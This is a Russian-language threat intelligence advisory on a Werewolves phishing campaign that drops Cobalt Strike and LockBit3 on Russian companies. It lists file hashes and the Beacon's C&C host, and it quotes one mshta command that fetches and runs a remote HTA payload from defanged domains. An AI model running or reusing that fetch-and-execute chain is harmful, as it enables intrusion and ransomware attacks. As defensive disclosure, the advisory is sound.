Werewolves сработали через ru: вымогатели провели новую массовую атаку на российские компании

Группировка Werewolves специализируется на вымогательстве денег с помощью версии программы-вымогателя LockBit3 (Black), собранной на основе появившегося в публичном пространстве билдера. У жертв требуют

Сами письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.

Жертва открывает вложенный документ «Рекламация.doc» (SHA256: da9e7da207a17076785dbe28d6c7922e81d07e84529f80e7a38265c5316fc8d2), который загружает RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.

На устройство жертвы загружается HTA (HTML Application):
mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.

HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается шелл-код Cobalt Strike Stager.

Stager загружает Сobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru

Клиенты F.A.C.C.T. Threat Intelligence оперативно получили оповещение о данной массовой атаке и индикаторы компрометации.

Индикаторы компрометацииФайловые индикаторы

рекламация.doc

MD5 adf61ffa03806b954450c8954fb976c7
SHA1 e5d279c7d3e343008b21b0e3d6a840a0c34ae3d3
SHA256 da9e7da207a17076785dbe28d6c7922e81d07e84529f80e7a38265c5316fc8d2

logista.rtf

MD5 cdfb407a0b894f5b4a6108273b81d864
SHA1 ebdf4a64db69c83b5af87ddf47b23a7af3d63914
SHA256 e7c0850f41a5f486dc26c4b62f45f6187ce4145653145fa60ec34abd57bbec98